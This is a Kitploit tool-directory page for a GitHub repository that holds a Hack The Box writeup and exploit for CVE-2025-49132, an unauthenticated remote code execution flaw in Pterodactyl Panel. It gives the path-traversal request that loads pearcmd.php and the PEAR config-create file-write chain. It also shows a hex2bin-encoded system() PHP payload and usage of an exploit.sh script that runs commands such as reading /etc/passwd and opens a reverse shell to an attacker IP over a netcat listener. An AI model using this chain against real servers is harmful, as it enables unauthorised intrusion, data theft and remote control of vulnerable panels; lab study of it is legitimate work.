Skip to content
KitploitKITPLOIT
ToolsBlog
Submit
ToolsBlog
Submit

Hacking, PenTest, and Cybersecurity Tools for Your Security Arsenal!

Kitploit is a directory of hacking, cybersecurity, and pentesting tools. Discover the latest project updates to find vulnerabilities, analyze systems, automate testing, and strengthen your security.

··Feeds·Contact·Privacy·© 2026 Kitploit

Tool Directory

Categories

View all categories
Loading categories
CVE-2025-49132_HTB_SEASON10 — Unauthenticated RCE exploit for CVE-2025-49132 in Pterodactyl Panel via path traversal, PEAR command injection, and PHP code execution. Includes HTB writeup and helper script. | Kitploit
Tools/GitHubGitHub/ahmedf000/cve-2025-49132_htb_season10
Vulnerability AnalysisExploitationWeb Application ExploitationCTFPenetration TestingLearning & Education
GitHubahmedf000/cve-2025-49132_htb_season10

CVE-2025-49132_HTB_SEASON10

Unauthenticated RCE exploit for CVE-2025-49132 in Pterodactyl Panel via path traversal, PEAR command injection, and PHP code execution. Includes HTB writeup and helper script.

View Repository
26 months agoNot yet reviewed

Most Popular

View all →

Discover the most used tools by our community.

Explore all tools

Browse our collection of tools

View all tools →
Share

CVE-2025-49132 - Pterodactyl Panel RCE Exploit

HTB Season 10 - Pterodactyl Machine Writeup

Overview

Target: Pterodactyl HTB Machine (Medium Difficulty)
CVE: CVE-2025-49132
Severity: Critical (CVSS 9.8)
Attack Type: Unauthenticated Remote Code Execution
Affected: Pterodactyl Panel < v1.11.11

This exploit chain combines:

  1. Path Traversal in locale translation system
  2. PEAR Command Injection via pearcmd.php
  3. PHP Code Execution through file write + include

The Bug

Pterodactyl Panel's /locales/locale.json endpoint allows path traversal through the locale parameter:

root@kitploit:~
GET /locales/locale.json?locale=../../../../../../usr/share/php/PEAR&namespace=pearcmd

This can be chained with PEAR's pearcmd.php to:

  1. Write arbitrary PHP files to /tmp
  2. Execute them via another request

Why It Works

PEAR (PHP Extension and Application Repository) has a CLI tool (pearcmd.php) that:

  • Accepts commands via URL parameters (intended for CLI only)
  • Has a config-create command that writes files
  • Has NO authentication when called via web

The Exploit Chain:

root@kitploit:~
Path Traversal → Load pearcmd.php → Inject PHP via config-create → Execute malicious PHP

The Hex2bin() Trick

Commands are hex-encoded using hex2bin() to bypass:

  • URL encoding issues
  • Special character filters
  • Nginx/PHP parsing problems

Example:

root@kitploit:~
Command: whoami
Hex:     77686f616d69
Payload: <?=system(hex2bin('77686f616d69'))?>

Remote Code Execution

Method: Using provided exploit.sh

root@kitploit:~
chmod +x exploit.sh

# Get user flag
./exploit.sh flag

# Execute commands
./exploit.sh cmd "whoami"
./exploit.sh cmd "cat /etc/passwd"

# Reverse shell
nc -lvnp 4444  # On attacker machine
./exploit.sh shell 10.10.14.21 4444

References

CVE & Exploits

  • NVD - CVE-2025-49132
  • OpenCVE - CVE-2025-49132

Technical Resources

  • Pterodactyl Panel Docs
  • PEAR Documentation
  • OWASP Path Traversal

Download Tool